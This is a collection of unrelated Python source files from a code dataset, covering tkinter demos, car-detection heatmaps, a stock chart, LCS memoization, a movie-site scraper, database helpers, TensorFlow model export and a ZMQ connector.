+{"seq_id":"146172682","text":"import requests, json\nfrom tkinter import *\n\ndef click1():\n label1 = Label(frame1, text=\"Frame 1 open\")\n label1.pack()\n\ndef click2():\n label1 = Label(frame1, text=\"Frame 2 open\")\n label1.pack()\n\n\nwindow = Tk()\nwindow.geometry(\"400x400\")\n\n\nbtn1 = Button(window, text=\"frame1\", command=click1)\nbtn1.pack()\n\nbtn2 = Button(window, text=\"frame2\", command=click2)\nbtn2.pack()\n\nframe1 = Frame(window, bg=\"blue\", width=100, height=100)\nframe1.pack()\n\nlabel3 = Label(frame1, bg=\"black\", fg=\"white\", text=\"Label 3 in Frame 1\")\nlabel3.pack()\n\nwindow.mainloop()\n","sub_path":"tkinterExamples/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"544470920","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 26 23:16:49 2017\n\n@author: subbu\n\"\"\"\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nimport cv2\nfrom scipy.ndimage.measurements import label\nfrom project_utils import *\n\ny_start_stop = [400, 656] # Min and max in y to search in slide_window()\n\nimage = mpimg.imread('../test_images/test1.jpg')\n\nprint(image.shape)\ndraw_image = np.copy(image)\n\n# Uncomment the following line if you extracted training\n# data from .png images (scaled 0 to 1 by mpimg) and the\n# image you are searching is a .jpg (scaled 0 to 255)\nimage = image.astype(np.float32)/255\n\nbbox_list = []\nfor scale in [1,1.5,2]:\n bblist = find_cars(image, y_start_stop[0], y_start_stop[1], scale, svc, X_scaler, orient, pix_per_cell, cell_per_block, spatial_size, hist_bins)\n bbox_list = bbox_list + bblist\n\nheat = np.zeros_like(image[:,:,0]).astype(np.float)\nheat = add_heat(heat,bbox_list)\nheat = apply_threshold(heat,1) \nheatmap = np.clip(heat, 0, 255)\nlabels = label(heatmap)\ndraw_img = draw_labeled_bboxes(draw_image, labels)\n\n\nfig = plt.figure()\nplt.subplot(121)\nplt.imshow(draw_img)\nplt.title('Car Positions')\nplt.subplot(122)\nplt.imshow(heatmap, cmap='hot')\nplt.title('Heat Map')\nfig.tight_layout()\n","sub_path":"pyfiles/project_test.py","file_name":"project_test.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"611874240","text":"import requests # API requesting\nimport datetime, time # time functionsality\nimport ast # dictionay functionality\nimport matplotlib.pyplot as plt \nimport sys\nimport plotly.graph_objects as go # graphical\n\nimport stock_func as sf\n# Time (Month ago) -------------------------------------------------------------------\n\nlM_timeStamp,lM_unix,lY_timeStamp,lY_unix,curr_unix, D,M,Y = sf.getdate()\n\n# STOCK ------------------------------------------------------------------------\n\n#TYPE options: 'stock/profile', 'quote'\ntypeURL = 'quote'\nticker = 'IBM' # str(input(\"Ticker Name: \"))\ntickerURL = '?symbol=' + ticker\n\ndata_time = 'M' # str(input('View DATA over last Year or Month [Y/M]'))\n\nstockCandleUrl, currStockPriceURL = sf.glueURL(tickerURL, lY_unix, lM_unix, curr_unix, data_time)\n\nstockCandleREQ = requests.get(stockCandleUrl)\ncurrSPREQ = requests.get(currStockPriceURL)\n\nstockCandle_fileCheck = str(stockCandleREQ.json())\ncurrSP_fileCheck = str(currSPREQ.json())\n\nstockCandleDATA = ast.literal_eval(stockCandle_fileCheck)\ncurrSPDATA = ast.literal_eval(currSP_fileCheck)\n\n# Checks if the ticker Exists\nsf.fileCheck(stockCandle_fileCheck, stockCandleDATA, currSP_fileCheck, currSPDATA)\n\n# Plotting Candle Data\n\ncloseCandlePrice = stockCandleDATA['c'[0]]\ntimeStamp = 0\ncurrStockPrice = currSPDATA['c']\n\nx_axis = [datetime.datetime.utcfromtimestamp(stockCandleDATA['t'[0]][i]).strftime('%Y-%m-%d') for i in range(len(closeCandlePrice))]\n\n# Plotly\nfig = go.Figure()\nfig.add_trace(go.Scatter(x=x_axis, y=closeCandlePrice,\n mode='lines',\n name='closingStockPrice'))\nfig.show()\n\n\n","sub_path":"stock_api.py","file_name":"stock_api.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"622838896","text":"\"\"\"\nAA, December 2020\nAssignment 1: Estratégias de Desenvolvimento de Algoritmos \n - The Longest Common Subsequence Problem\nAutor: Ana Sofia Fernandes, 88739\n\"\"\"\nfrom functools import *\nimport sys\nimport time\n\n##Class that calculates Longest Common Subsquence for two given strings, using memoization\n\nclass LCS_memoization_wrapper:\n\n def __init__(self, seqA , seqB):\n self.seqA = seqA\n self.seqB = seqB\n self.not_in_cache = 0\n self.cache_access = 0\n self.max_calc = 0\n self.sum_count = 0\n sys.setrecursionlimit(150000)\n\n def memo(self,func):\n\n \"\"\"\n Verifies if a given subproblem already exists - if so, the program\n accede to the cache and it doesn't have to be done recursively\n \"\"\"\n\n cache = {}\n @wraps(func)\n def wrap (*args):\n if args not in cache: \n self.not_in_cache += 1 \n cache[args] = func(*args)\n else:\n self.cache_access += 1 \n return cache[args]\n return wrap\n\n\n def lcs_recursive_way(self ,m, n):\n\n \"\"\"\n This function will calculate, in a recursive way, the len of the \n longest subsquence between two sequences. There are two cases:\n 1-The last character match - increment the length and proceed in the sequence (-1 in each)\n 2-The last character doesn't match - find the max between lcs_recursive_way(m-1,n) and lcs_recursive_way(m, n-1)\n \"\"\"\n \n # The len of each sequence passed will be used so that a for loop can be avoided\n if (m==0 or n==0): #If any have len=0, 0 will be returned\n return 0\n\n elif (self.seqA[m-1] == self.seqB[n-1]): #If the symbols match, 1 is added to the len (we have a match) \n #and a move in each sequence is made\n self.sum_count += 1\n return 1 + self.lcs_recursive_way(m-1,n-1)\n \n else: # If there's no match in that position\n self.max_calc += 1\n return max(self.lcs_recursive_way(m-1,n), self.lcs_recursive_way(m, n-1)) #We move in each sequence and check which\n #one returns a max value for the len\n\n def get_lcs_len_memoization(self):\n\n \"\"\"\n Getter for lcs len\n \"\"\"\n\n start_time = time.time()\n self.lcs_recursive_way = self.memo(self.lcs_recursive_way)\n final= self.lcs_recursive_way(len(self.seqA), len(self.seqB))\n end_time = time.time() - start_time\n print(\"\\nAlgorithm used - memoization \\n\"\n +\"\\n--- LCS len: %s \" % (final) \n +\"\\n--- Execution time: %s seconds\" % (round(end_time,7))\n +\"\\n--- Basic operations: %s sums and %s maximum calculations\" % (self.sum_count, self.max_calc)\n +\"\\n--- Number of cache accesses: %s \" % (self.cache_access)\n +\"\\n--- The subproblem wasn't in cache %s times.\" % (self.not_in_cache))\n","sub_path":"88739_AA_1stProject/code/Memoization/LCS_memoization_wrapper.py","file_name":"LCS_memoization_wrapper.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"420488955","text":"# pylint: disable=no-member\n# -*- encoding: utf-8 -*-\n'''\n@File : 电影天堂.py\n@Time : 2019/09/24 14:28:54\n@Author : Kellan Fan \n@Version : 1.0\n@Contact : kellanfan1989@gmail.com\n@Desc : 获取电影天堂的最新电影资源\n'''\n\n# here put the import lib\nimport json\nimport etcd\nimport psycopg2\nfrom lxml import etree\nfrom misc.openurl import OpenUrl\nclass Mypostgres(object):\n def __init__(self):\n etc_client = etcd.Client(host='10.91.158.2', port=2379)\n etc_result = etc_client.read('/project/spiderman/postgres')\n postgresql_info = json.loads(etc_result.value)\n self.db=psycopg2.connect(database=postgresql_info['database'], user=postgresql_info['user'], password=postgresql_info['password'], host=postgresql_info['host'], port=postgresql_info['port'])\n self.cursor=self.db.cursor()\n\n def close(self):\n self.cursor.close()\n self.db.close()\n\n def change_data(self, sql):\n try:\n self.cursor.execute(sql)\n self.db.commit()\n return 0\n except Exception as e:\n self.db.rollback()\n return e\n\n def select_data(self, sql):\n try:\n self.cursor.execute(sql)\n except Exception as e:\n return e\n else:\n return self.cursor.fetchall()\n\ndef getMovieUrl(html):\n selecter = etree.HTML(html)\n movie_url = selecter.xpath(\"//div[@class='bd3']/div[@class='bd3r'][1]/div/div[@class='bd3rl']/div[@class='co_area2'][1]//a/@href\")\n movie_url = set(movie_url)\n movie_url.remove('/app.html')\n movie_url.remove('/html/gndy/dyzz/index.html') \n return movie_url\n\ndef getMovieInfo(url):\n full_url = 'https://www.dytt8.net/' + url\n ourl = OpenUrl(full_url,'gb2312')\n code,html = ourl.openurl()\n info = {}\n if code==200:\n selecter = etree.HTML(html)\n try:\n info['name'] = selecter.xpath(\"//div[@class='title_all']/h1/font/text()\")[0]\n info['public_time'] = selecter.xpath(\"//div[@class='co_content8']/ul/text()\")[0].strip().split(':')[1]\n info['downlink'] = selecter.xpath(\"//tbody/tr/td/a/text()\")[0]\n return info\n except:\n return None\n\nif __name__ == \"__main__\":\n start_url='https://www.dytt8.net/'\n ourl = OpenUrl(start_url)\n code,html = ourl.openurl()\n if code == 200:\n info_list = []\n movie_list = getMovieUrl(html)\n for url in movie_list:\n tmp = getMovieInfo(url)\n if tmp:\n info_list.append(tmp)\n postgresql = Mypostgres()\n select_cmd = 'select public_time from dian_ying_tian_tang order by public_time desc limit 1'\n last_time = postgresql.select_data(select_cmd)[0][0].strip()\n for info in info_list:\n if info['public_time'] > last_time:\n cmd = \"insert into dian_ying_tian_tang(name,public_time,downlink) values ('%s', '%s', '%s')\"%(info['name'],info['public_time'],info['downlink'])\n res = postgresql.change_data(cmd)\n if res == 0:\n print(\"insert [%s] ok..\"%info['name'])\n else:\n print(res)\n postgresql.close()","sub_path":"spiderman/电影天堂.py","file_name":"电影天堂.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"259623305","text":"import pymysql\r\n\r\nclass BDproduto(object):\r\n\r\n def __init__(self):\r\n self.db = pymysql.connect(\"localhost\", \"root\", \"\", \"comercio\")\r\n self.cursor = self.db.cursor()\r\n\r\n def gravaBDproduto(self, codigo, nome, valorUnitario, quantidade):\r\n dados = (codigo, nome, valorUnitario, quantidade)\r\n self.cursor.execute(\"INSERT INTO produto(codigo, nome, valorUnitario, quantidade) VALUES (%s, %s, %s, %s)\", dados)\r\n self.db.commit()\r\n self.db.close()\r\n\r\n def atualizaNome(self, codigo, nome):\r\n dados = (nome, codigo)\r\n self.cursor.execute(\"UPDATE produto SET nome = %s WHERE codigo = %s\", dados)\r\n self.db.commit()\r\n self.db.close()\r\n\r\n def atualizaValorUnitario(self, codigo, valorUnitario):\r\n dados = (valorUnitario, codigo)\r\n self.cursor.execute(\"UPDATE produto SET valorUnitario = %s WHERE codigo = %s\", dados)\r\n self.db.commit()\r\n self.db.close()\r\n\r\n def atualizaQuantidade(self, codigo, quantidade):\r\n dados = (quantidade, codigo)\r\n self.cursor.execute(\"UPDATE produto SET quantidade = %s WHERE codigo = %s\", dados)\r\n self.db.commit()\r\n self.db.close()\r\n\r\n def recuperaBDproduto(self, codigo):\r\n self.cursor.execute(\"SELECT * FROM produto WHERE codigo = %s\", codigo)\r\n dado = self.cursor.fetchall()\r\n self.db.close()\r\n return dado\r\n\r\n def validaBDcodigo(self, codigo):\r\n self.cursor.execute(\"SELECT codigo FROM produto WHERE codigo = %s\", codigo)\r\n dado = self.cursor.fetchone()\r\n self.db.close()\r\n if not dado:\r\n return False\r\n else:\r\n return True","sub_path":"algoritmos/Ex1/Codigo Sistema Comercio/BDProduto.py","file_name":"BDProduto.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"101631178","text":"# -*- coding:utf-8 -*-\nimport logging\nimport os\nimport zipfile\nfrom urllib.parse import urlparse\n\nimport numpy as np\nimport tensorflow as tf\nfrom pai_tf_predict_proto import tf_predict_pb2\n\nfrom com.aliyun.api.gateway.sdk import client\nfrom com.aliyun.api.gateway.sdk.common import constant\nfrom com.aliyun.api.gateway.sdk.http import request\n\n\ndef zip_file(src_dir):\n zip_name = src_dir + '.zip'\n with zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED) as z:\n for dirpath, dirnames, filenames in os.walk(src_dir):\n fpath = dirpath.replace(src_dir, '')\n fpath = fpath and fpath + os.sep or ''\n for filename in filenames:\n z.write(os.path.join(dirpath, filename), fpath + filename)\n\n\ndef get_last_meta_path(save_path):\n path = \"/\".join(save_path.split(\"/\")[:-1])\n model_name = save_path.split(\"/\")[-1]\n\n meta_file_info = {}\n for file_name in os.listdir(path):\n if file_name.find(model_name) == 0 and len(file_name) > 5 and file_name[-5:] == \".meta\":\n step_str = file_name[:-5].split(\"-\")[-1]\n try:\n meta_file_info[int(step_str)] = os.path.join(path, file_name)\n except ValueError as e:\n logging.error(e, exc_info=1)\n meta_file_info[0] = os.path.join(path, file_name)\n\n if not meta_file_info:\n return None\n\n meta_keys = list(meta_file_info.keys())\n meta_keys.sort()\n return meta_file_info[meta_keys[-1]]\n\n\ndef get_saver_and_last_step(meta_path, sess):\n if meta_path is None:\n return None, -1\n else:\n saver = tf.train.import_meta_graph(meta_path)\n saver.restore(sess, meta_path[:-5])\n try:\n return saver, int(meta_path[:-5].split(\"-\")[-1])\n except ValueError as e:\n logging.error(e, exc_info=1)\n return saver, -1\n\n\nclass LearningRate(object):\n def __init__(self):\n self._count = 0\n self._init = 0.01\n\n def get_learning_rate(self):\n return self._init * 0.95\n\n\nclass LinearFit(object):\n def __init__(self):\n self.sess = None\n self.learning_rate_manager = LearningRate()\n self.save_path = os.path.join(os.path.dirname(__file__), \"models_meta\", self.__class__.__name__)\n if not os.path.exists(self.save_path):\n os.makedirs(self.save_path, exist_ok=True)\n\n # 数据集\n train_data_size = 10000\n self.train_data_x = np.random.rand(train_data_size) * 10 # 0-10取值\n self.train_data_y = 20 * self.train_data_x + 3 + np.random.normal(loc=0, scale=0.1, size=(train_data_size,))\n self.test_data_x = np.arange(0, 10)\n self.test_data_y = 20 * self.test_data_x + 3\n\n @staticmethod\n def batch_data(x, y, size=128, last_cursor=None):\n if last_cursor is None:\n return x[:size], y[:size]\n else:\n if last_cursor + size >= x.shape[0]:\n return None, None\n return x[last_cursor: last_cursor + size], y[last_cursor:last_cursor + size]\n\n @staticmethod\n def build():\n # 参数\n tf_x = tf.placeholder(tf.float32, name=\"x\")\n tf_y = tf.placeholder(tf.float32, name=\"y\")\n tf_w = tf.Variable(0.0, name=\"w\", )\n tf_b = tf.Variable(0.0, name=\"b\", )\n tf_learning_rate = tf.Variable(0.01, name=\"learning_rate\")\n\n tf_y_predict = tf.multiply(tf_x, tf_w) + tf_b\n\n cross_entropy = tf.reduce_mean(tf.multiply(tf.square(tf_y - tf_y_predict), 0.5))\n train_step = tf.train.GradientDescentOptimizer(tf_learning_rate).minimize(cross_entropy)\n tf.add_to_collection(\"inputs\", tf_x)\n tf.add_to_collection(\"inputs\", tf_y)\n tf.add_to_collection(\"outputs\", tf_y_predict)\n tf.add_to_collection(\"outputs\", cross_entropy)\n tf.add_to_collection(\"outputs\", train_step)\n\n def train(self):\n if self.sess is None:\n self.sess = tf.InteractiveSession()\n\n saver, last_step = get_saver_and_last_step(get_last_meta_path(self.save_path), self.sess)\n if saver is None:\n # 没有持久化: 重新初始化模型\n print(\" init models ...\")\n self.build()\n self.sess.run(tf.global_variables_initializer())\n self.sess.run(tf.local_variables_initializer())\n saver = tf.train.Saver()\n else:\n print(\" restoring models ...\")\n\n tf_x, tf_y = tf.get_collection('inputs')\n tf_y_predict, cross_entropy, train_step = tf.get_collection(\"outputs\")\n graph = tf.get_default_graph()\n tf_w = graph.get_tensor_by_name(\"w:0\")\n tf_b = graph.get_tensor_by_name(\"b:0\")\n tf_learning_rate = graph.get_tensor_by_name(\"learning_rate:0\")\n print(\"w is {}, b is {}\".format(self.sess.run(tf_w), self.sess.run(tf_b)))\n\n batch_size = 1000\n global_step = last_step\n for i in range(10):\n train_data_cursor = 0\n while True:\n batch_x, batch_y = self.batch_data(self.train_data_x, self.train_data_y, batch_size, train_data_cursor)\n train_data_cursor = train_data_cursor + batch_size\n if batch_x is None and batch_y is None:\n break\n self.sess.run(train_step, feed_dict={tf_x: batch_x,\n tf_y: batch_y,\n tf_learning_rate: self.learning_rate_manager.get_learning_rate()})\n\n global_step += 1\n if global_step % 10 == 0:\n saver.save(self.sess, self.save_path, global_step=global_step)\n\n print(\"w is {}, b is {}\".format(self.sess.run(tf_w), self.sess.run(tf_b)))\n print(\"cross is {}\".format(self.sess.run(tf.reduce_mean(\n self.sess.run(cross_entropy, feed_dict={tf_x: self.test_data_x, tf_y: self.test_data_y})\n ))))\n\n self.sess.close()\n\n def build_simple_model(self, export_dir: str):\n \"\"\" \"\"\"\n sess = tf.InteractiveSession()\n saver, last_step = get_saver_and_last_step(get_last_meta_path(self.save_path), sess)\n tf_x, tf_y = tf.get_collection('inputs')\n tf_y_predict, cross_entropy, train_step = tf.get_collection(\"outputs\")\n graph = tf.get_default_graph()\n tf_w = graph.get_tensor_by_name(\"w:0\")\n tf_b = graph.get_tensor_by_name(\"b:0\")\n tf.saved_model.simple_save(\n session=sess,\n export_dir=export_dir,\n inputs={\"x\": tf_x},\n outputs={\"y\": tf_y_predict},\n )\n sess.close()\n\n def build_complex_model(self, export_dir: str):\n \"\"\" \"\"\"\n sess = tf.InteractiveSession()\n saver, last_step = get_saver_and_last_step(get_last_meta_path(self.save_path), sess)\n tf_x, tf_y = tf.get_collection('inputs')\n tf_y_predict, cross_entropy, train_step = tf.get_collection(\"outputs\")\n graph = tf.get_default_graph()\n tf_w = graph.get_tensor_by_name(\"w:0\")\n tf_b = graph.get_tensor_by_name(\"b:0\")\n\n # 调整模型\n tf_d = tf.placeholder(tf.float32, name=\"d\")\n new_y = tf_y_predict + tf_d\n\n tf.saved_model.simple_save(\n session=sess,\n export_dir=export_dir,\n inputs={\"x\": tf_x, \"d\": tf_d},\n outputs={\"y\": new_y},\n )\n sess.close()\n\n def serving(self, saved_model_dir: str):\n \"\"\" 运行服务 \"\"\"\n pass\n\n\nclass PAIClientDemo(object):\n app_key = 'xxx'\n app_secret = 'xxx'\n\n @staticmethod\n def predict(url, app_key, app_secret, request_data):\n cli = client.DefaultClient(app_key=app_key, app_secret=app_secret)\n body = request_data\n url_ele = urlparse(url)\n host = 'https://' + url_ele.hostname\n path = url_ele.path\n req_post = request.Request(host=host, protocol=constant.HTTP, url=path, method=\"POST\", time_out=6000)\n req_post.set_body(body)\n req_post.set_content_type(constant.CONTENT_TYPE_STREAM)\n stat, header, content = cli.execute(req_post)\n return stat, dict(header) if header is not None else {}, content\n\n def simple(self, x: float):\n # 输入模型信息,点击模型名字就可以获取到了\n url = 'https://xxxx-cn-shenzhen.alicloudapi.com/EAPI_1372988890346240_demo_simple'\n\n # 构造服务\n _request = tf_predict_pb2.PredictRequest()\n _request.signature_name = 'serving_default'\n _request.inputs['x'].dtype = tf_predict_pb2.DT_FLOAT # images 参数类型\n _request.inputs['x'].float_val.extend([x])\n\n # 将pb序列化成string进行传输\n request_data = _request.SerializeToString()\n stat, header, content = self.predict(url, self.app_key, self.app_secret, request_data)\n if stat != 200:\n print('Http status code: ', stat)\n print('Error msg in header: ', header['x-ca-error-message'] if 'x-ca-error-message' in header else '')\n print('Error msg in body: ', content)\n else:\n response = tf_predict_pb2.PredictResponse()\n response.ParseFromString(content)\n print(response)\n\n def complex(self, x: float, d: float):\n # 输入模型信息,点击模型名字就可以获取到了\n url = \"https://xxxx-cn-shenzhen.alicloudapi.com/EAPI_1372988890346240_demo_complex\"\n\n # 构造服务\n _request = tf_predict_pb2.PredictRequest()\n _request.signature_name = 'serving_default'\n _request.inputs['x'].dtype = tf_predict_pb2.DT_FLOAT # images 参数类型\n _request.inputs['x'].float_val.extend([x])\n\n _request.inputs['d'].dtype = tf_predict_pb2.DT_FLOAT # images 参数类型\n _request.inputs['d'].float_val.extend([d])\n\n # 将pb序列化成string进行传输\n request_data = _request.SerializeToString()\n stat, header, content = self.predict(url, self.app_key, self.app_secret, request_data)\n if stat != 200:\n print('Http status code: ', stat)\n print('Error msg in header: ', header['x-ca-error-message'] if 'x-ca-error-message' in header else '')\n print('Error msg in body: ', content)\n else:\n response = tf_predict_pb2.PredictResponse()\n response.ParseFromString(content)\n print(response)\n\n\ndef build_model(_export_dir: str):\n if not os.path.exists(_export_dir):\n os.makedirs(_export_dir, exist_ok=True)\n\n LinearFit().build_simple_model(export_dir=_export_dir)\n\n zip_file(_export_dir)\n\n\ndef call_simple_server(x: float):\n PAIClientDemo().simple(x=x)\n\n\ndef build_complex_model(_export_dir: str):\n if not os.path.exists(_export_dir):\n os.makedirs(_export_dir, exist_ok=True)\n\n LinearFit().build_complex_model(export_dir=_export_dir)\n\n zip_file(_export_dir)\n\n\ndef call_complex_server(x: float, d: float):\n PAIClientDemo().complex(x=x, d=d)\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":10955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"634898471","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\n\r\nclass Encoder(nn.Module):\r\n def __init__(self,\r\n in_channels=567,\r\n z_channels=128):\r\n super(Encoder, self).__init__()\r\n \r\n self.in_channels = in_channels\r\n self.z_channels = z_channels\r\n \r\n self.conv1d_start = nn.Conv1d(in_channels, 768, kernel_size=3,\r\n padding=(3 - 1) // 2)\r\n self.gblocks = nn.ModuleList ([\r\n GBlock(768, 768, z_channels, 1),\r\n GBlock(768, 768, z_channels, 1),\r\n GBlock(768, 384, z_channels, 2),\r\n GBlock(384, 384, z_channels, 2),\r\n GBlock(384, 384, z_channels, 2),\r\n GBlock(384, 192, z_channels, 3),\r\n GBlock(192, 96, z_channels, 5)\r\n ])\r\n self.conv1d_end = nn.Conv1d(96, 1, kernel_size=3, padding=(3 - 1) // 2)\r\n \r\n def forward(self, inputs, z):\r\n outputs = self.conv1d_start(inputs)\r\n for layer in self.gblocks:\r\n outputs = layer(outputs, z)\r\n outputs = self.conv1d_end(outputs)\r\n \r\n return outputs\r\n\r\nclass GBlock(nn.Module):\r\n def __init__(self,\r\n in_channels,\r\n hidden_channels,\r\n z_channels,\r\n upsample_factor):\r\n super(GBlock, self).__init__()\r\n self.in_channels = in_channels\r\n self.hidden_channels = hidden_channels\r\n self.upsample_factor = upsample_factor\r\n \r\n self.condition_batchnorm1 = ConditionalBatchNorm1d(in_channels)\r\n self.linear1 = nn.Linear(z_channels, in_channels)\r\n self.stack_first = nn.Sequential(\r\n nn.ReLU(inplace=False),\r\n UpsampleNet(in_channels, in_channels, upsample_factor),\r\n nn.Conv1d(in_channels, hidden_channels, kernel_size=3,\r\n padding=(3 - 1) // 2)\r\n )\r\n \r\n self.condition_batchnorm2 = ConditionalBatchNorm1d(hidden_channels)\r\n self.linear2 = nn.Linear(z_channels, hidden_channels)\r\n self.second_stack = nn.Sequential(\r\n nn.ReLU(inplace=False),\r\n nn.Conv1d(hidden_channels, hidden_channels, kernel_size=3,\r\n dilation=2, padding=2 * (3 - 1) // 2)\r\n )\r\n \r\n self.residual1 = nn.Sequential(\r\n UpsampleNet(in_channels, in_channels, upsample_factor), \r\n nn.Conv1d(in_channels, hidden_channels, kernel_size=1)\r\n )\r\n \r\n self.condition_batchnorm3 = ConditionalBatchNorm1d(hidden_channels)\r\n self.linear3 = nn.Linear(z_channels, hidden_channels)\r\n self.third_stack = nn.Sequential(\r\n nn.ReLU(inplace=False),\r\n nn.Conv1d(hidden_channels, hidden_channels, kernel_size=3,\r\n dilation=4, padding=4 * (3 - 1) // 2)\r\n )\r\n \r\n self.condition_batchnorm4 = ConditionalBatchNorm1d(hidden_channels)\r\n self.linear4 = nn.Linear(z_channels, hidden_channels)\r\n self.fourth_stack = nn.Sequential(\r\n nn.ReLU(inplace=False),\r\n nn.Conv1d(hidden_channels, hidden_channels, kernel_size=3,\r\n dilation=8, padding=8 * (3 - 1) // 2)\r\n )\r\n \r\n def forward(self, condition, z):\r\n inputs = condition\r\n outputs = self.condition_batchnorm1(inputs, self.linear1(z))\r\n outputs = self.stack_first(outputs)\r\n outputs = self.condition_batchnorm2(outputs, self.linear2(z))\r\n \r\n residual_outputs = self.residual1(inputs)\r\n \r\n residual_outputs = outputs + residual_outputs\r\n \r\n outputs = self.condition_batchnorm3(residual_outputs, self.linear3(z))\r\n outputs = self.third_stack(outputs)\r\n outputs = self.condition_batchnorm4(outputs, self.linear4(z))\r\n outputs = self.fourth_stack(outputs)\r\n \r\n outputs = outputs + residual_outputs\r\n \r\n return outputs\r\n \r\n \r\nclass UpsampleNet(nn.Module):\r\n def __init__(self,\r\n input_size,\r\n output_size,\r\n upsample_factor,\r\n use_lstm=False,\r\n lstm_layer=2,\r\n upsample_method=\"duplicate\"):\r\n\r\n super(UpsampleNet, self).__init__()\r\n self.upsample_method = upsample_method\r\n self.upsample_factor = upsample_factor\r\n self.use_lstm = use_lstm\r\n if use_lstm:\r\n self.lstm_layer = nn.LSTM(input_size, output_size, num_layers=lstm_layer, batch_first=True)\r\n if upsample_method == 'duplicate':\r\n self.upsample_factor = int(np.prod(upsample_factor))\r\n elif upsample_method == 'transposed_conv2d':\r\n assert isinstance(upsample_factor, tuple)\r\n kernel_size = 3\r\n self.upsamples = nn.ModuleList()\r\n for u in upsample_factor:\r\n padding = (kernel_size - 1) // 2\r\n conv = nn.ConvTranspose2d(1, 1, (kernel_size, 2 * u),\r\n padding=(padding, u // 2),\r\n dilation=1, stride=(1, u))\r\n self.upsamples.append(conv)\r\n\r\n def forward(self, inputs):\r\n if self.use_lstm:\r\n inputs, _ = self.lstm_layer(inputs.transpose(1, 2))\r\n inputs = inputs.transpose(1, 2)\r\n if self.upsample_method == 'duplicate':\r\n output = F.interpolate(inputs, scale_factor=self.upsample_factor, mode='nearest')\r\n elif self.upsample_method == 'transposed_conv2d':\r\n output = input.unsqueeze(1)\r\n for layer in self.upsamples:\r\n output = layer(output)\r\n output = output.squeeze(1)\r\n output = output[:, :, : input.size(-1) * np.prod(self.upsample_factor)]\r\n\r\n return output\r\n \r\nclass ConditionalBatchNorm1d(nn.BatchNorm1d):\r\n \r\n \"\"\"Conditional Batch Normalization\"\"\"\r\n\r\n def __init__(self,\r\n num_features,\r\n eps=1e-05,\r\n momentum=0.1,\r\n affine=False,\r\n track_running_stats=True):\r\n \r\n super(ConditionalBatchNorm1d, self).__init__(\r\n num_features=num_features,\r\n eps=eps,\r\n momentum=momentum,\r\n affine=affine,\r\n track_running_stats=track_running_stats\r\n )\r\n self.scale = nn.Linear(num_features, num_features)\r\n self.shift = nn.Linear(num_features, num_features)\r\n\r\n def forward(self, input, condition):\r\n self._check_input_dim(input)\r\n\r\n exponential_average_factor = 0.0\r\n\r\n if self.training and self.track_running_stats:\r\n self.num_batches_tracked += 1\r\n if self.momentum is None: # use cumulative moving average\r\n exponential_average_factor = 1.0 / self.num_batches_tracked.item()\r\n else: # use exponential moving average\r\n exponential_average_factor = self.momentum\r\n\r\n output = F.batch_norm(input, self.running_mean, self.running_var,\r\n self.weight, self.bias,\r\n self.training or not self.track_running_stats,\r\n exponential_average_factor, self.eps)\r\n \r\n size = output.size()\r\n \r\n scale = self.scale(condition).unsqueeze(-1).expand(size)\r\n shift = self.shift(condition).unsqueeze(-1).expand(size)\r\n output = scale * output + shift\r\n \r\n return output\r\n\r\nmodel = Encoder(567, 128)\r\n\r\ncondition = torch.randn(2, 567, 10)\r\nz = torch.randn(2, 128)\r\n\r\noutput = model(condition, z)\r\nprint(output.shape)","sub_path":"modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":7725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"557699627","text":"\nimport zmq\nimport multiprocessing.dummy as thread\n\ndef _print(*args):\n print(\">netconnn>\",*args)\n\nclass ConnectorNetwork:\n def __init__(self,netconf,appid,name):\n self.netconf = netconf\n self.appid = appid\n self.name = name\n self.myaddr = self.netconf.get_address(name)\n\n mux_addr = self.netconf.get_address('MUX_in')\n ctx = zmq.Context()\n self.mux_sock= ctx.socket(zmq.PUSH)\n self.mux_sock.connect(mux_addr)\n\n self.notif_sock = ctx.socket(zmq.REP)\n self.notif_sock.bind(self.myaddr)\n\n def send(self,message):\n message['appid']=self.appid\n self.mux_sock.send_json(message)\n\n def listen_for_notif(self, callback):\n def listener(callback):\n _print(\"Listening DMX on %s ...\"%self.myaddr)\n while True:\n notif = self.notif_sock.recv_json()\n try:\n response = callback(notif)\n except Exception as e:\n _print(\"ERROR in notif callback. sending fail\")\n self.notif_sock.send_string(\"FAIL\")\n raise e\n\n self.notif_sock.send_string(response)\n\n p = thread.Process(target=listener, args=(callback,),\n name=self.name+'_notif_listen')\n p.start()\n return p\n\n","sub_path":"v2/goalnet/connectors/tasks/intra.py","file_name":"intra.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"600495818","text":"# -*- coding:utf8 -*-\n\n\n\ndef request_upload_media(gcid, size, title):\n payload = {\n \"bisType\": \"websessionId\",\n \"oauthAppId\": \"mobileThunderSubscription\",\n #\"openId\": \"529942747\",\n \"openId\": str(g.user_id),\n #\"accessToken\": \"64F1E047EA04CFCFFB746052A530CB6103850DB77EBE90C1CBA807DBC403B85641F910BCEBA1147587754815A2BCCD11B668B4518FF0F209F98E66EEBB423CDE\",\n \"accessToken\": str(g.session_id),\n \"type\": 